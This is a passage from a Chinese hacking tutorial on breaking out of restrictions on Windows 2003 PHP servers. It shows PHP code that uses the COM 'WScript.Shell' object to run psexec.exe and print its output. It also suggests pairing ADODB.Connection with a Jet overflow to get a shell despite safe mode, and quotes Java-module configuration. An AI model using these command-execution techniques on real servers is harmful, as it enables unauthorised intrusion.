win2003 PHP服务器的突破新思路

2019-10-16 21:09:09丽君

  PHP 的 Windows 版本已经内置该扩展模块的支持。无需加载任何附加扩展库即可使用COM函数。它的使用方法类似于C++或Java中类的创建的语法,并把COM的类名作为参数传递到构造函数。例如使用在PHP中调用“WScript.Shell”执行系统命令:
  $cmd=” E:/cert/admin/psexec.exe”;
  if($com=new COM("WScript.Shell")) echo "yes";
  if(!$cmd1=$com->exec($cmd))
  {
  echo "can not exec()";
  }
  if(!$cmd2=$cmd1->stdout())
  {
  echo "can not stdout()";
  }
  if(!$cmd3=$cmd2->readall())
  {
  echo "can not readall()";
  }
  echo $cmd3;
  ?>
  图1是我写的一个执行psexec.exe的一个例子。
  这段代码与ASP的的意思是一模一样的,当然,你也可以像ASP那样调用“ADODB.Connection”,利用这个组件结合jet2溢出漏洞,可能能够在PHP Saft mode=ON下拿到一个Shell。
  //create the database connection
  $conn = new COM("ADODB.Connection");
  $dsn = "DRIVER={Microsoft Access Driver (*.mdb)}; DBQ=" . realpath("mydb.mdb");
  $conn->Open($dsn);
  //pull the data through SQL string
  $rs = $conn->Execute("select clients from web");
  …..
  ?>
  .Net 函数只能运行在 PHP 5上,当然,它需要 “.Net runtime”的支持,而且这的PHP的一个实验性模块,功能还未齐全,所以在这就不讨论了。
  4、Java()函数的应用
  该方法适用于safe mode=on。要使用JAVA模块服务器必须事先安装Java虚拟机,而且在PHP安装配置的时候打开了with-java的选项,代码如下:
  [JAVA]
  ;这是到php_java.jar的路径
  ;java.class.path = .php_java.jar
  ;JDK的路径
  ;Java.home = f:jdk1.3.0
  ;到虚拟机的路径
  ;Java.library=f:jdk1.3.0jrebinhostspotjvm.dll
  同COM一样,使用Java创建类(不仅仅是JavaBeans)只需把JAVA的类名作为参数传递到构造函数。以下是手册里边的一个例子:
  // This example is only intended to be run as a CGI.
  $frame = new Java('java.awt.Frame', 'PHP');
  $button = new Java('java.awt.Button', 'Hello Java World!');
  $frame->add('North', $button);
  $frame->validate();
  $frame->pack();
  $frame->visible = True;
  $thread = new Java('java.lang.Thread');
  $thread->sleep(10000);
  $frame->dispose();
  ?>
  可惜能真正支持JAVA的PHP服务器并不多见,所以在这也不多讨论了。
  5、socket()函数的应用
  socket 是PHP中功能极为强大的一个模块,如果你使用高级的、抽象的接口(由fsockopen()和psockopen函数打开的socket),是不需要打开“php_sockets.dll”的。但是如果要使用完整的socket函数块,就必须在php.ini这样设置: